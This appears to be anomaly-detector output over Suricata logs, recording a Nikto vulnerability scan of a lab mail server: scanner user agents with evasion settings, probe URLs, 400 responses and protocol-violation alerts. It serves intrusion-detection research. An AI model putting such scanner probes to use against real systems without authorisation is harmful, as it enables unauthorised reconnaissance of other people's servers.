(Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.rdf+destype=cache+desformat=PDF\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.162552, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1625615040672730,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46776,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.rdf+destype=cache+desformat=PDF\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.rdf+destype=cache+desformat=PDF\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46776,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.rdf+destype=cache+desformat=PDF\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", 
"/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.rdf+destype=cache+desformat=PDF\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.rdf+destype=cache+desformat=PDF\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.rdf+destype=cache+desformat=PDF\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.rdf+destype=cache+desformat=PDF", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.rdf+destype=cache+desformat=PDF", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": 
"\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46776,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", 
"/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46776, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1625615040672730,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1625615040672730, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.162552+0000\",\"flow_id\":1625615040672730,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46776,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.rdf+destype=cache+desformat=PDF\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.rdf+destype=cache+desformat=PDF\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.16 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", 
"Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.164694 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46778 -> 192.168.10.154:80", "/parser/model/time": 1583349514.164694, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46778, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.164694 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46778 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.16 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.pt-br", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": 
"{\"timestamp\":\"2020-03-04T19:18:34.164854+0000\",\"flow_id\":1725795152854985,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46778,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.pt-br\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.pt-br\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.164854, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1725795152854985,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46778,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.pt-br\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.pt-br\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46778,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.pt-br\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.pt-br\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.pt-br\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.pt-br\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.pt-br", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.pt-br", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": 
"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46778,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", 
"/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46778, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1725795152854985,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1725795152854985, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.164854+0000\",\"flow_id\":1725795152854985,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46778,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.pt-br\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.pt-br\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.16 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", 
"/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.166464 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46780 -> 192.168.10.154:80", "/parser/model/time": 1583349514.166464, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46780, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.166464 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46780 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.17 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], 
"AffectedLogAtomValues": [ "\\/bISn4adA.iso8859-8", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.166606+0000\",\"flow_id\":392624419276641,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46780,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.iso8859-8\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.iso8859-8\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.166606, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":392624419276641,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46780,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.iso8859-8\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.iso8859-8\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46780,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": 
",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.iso8859-8\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.iso8859-8\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.iso8859-8\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.iso8859-8\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.iso8859-8", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": 
"\\/bISn4adA.iso8859-8", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46780,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", 
"/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46780, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":392624419276641,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 392624419276641, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.166606+0000\",\"flow_id\":392624419276641,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46780,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.iso8859-8\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.iso8859-8\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.17 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) 
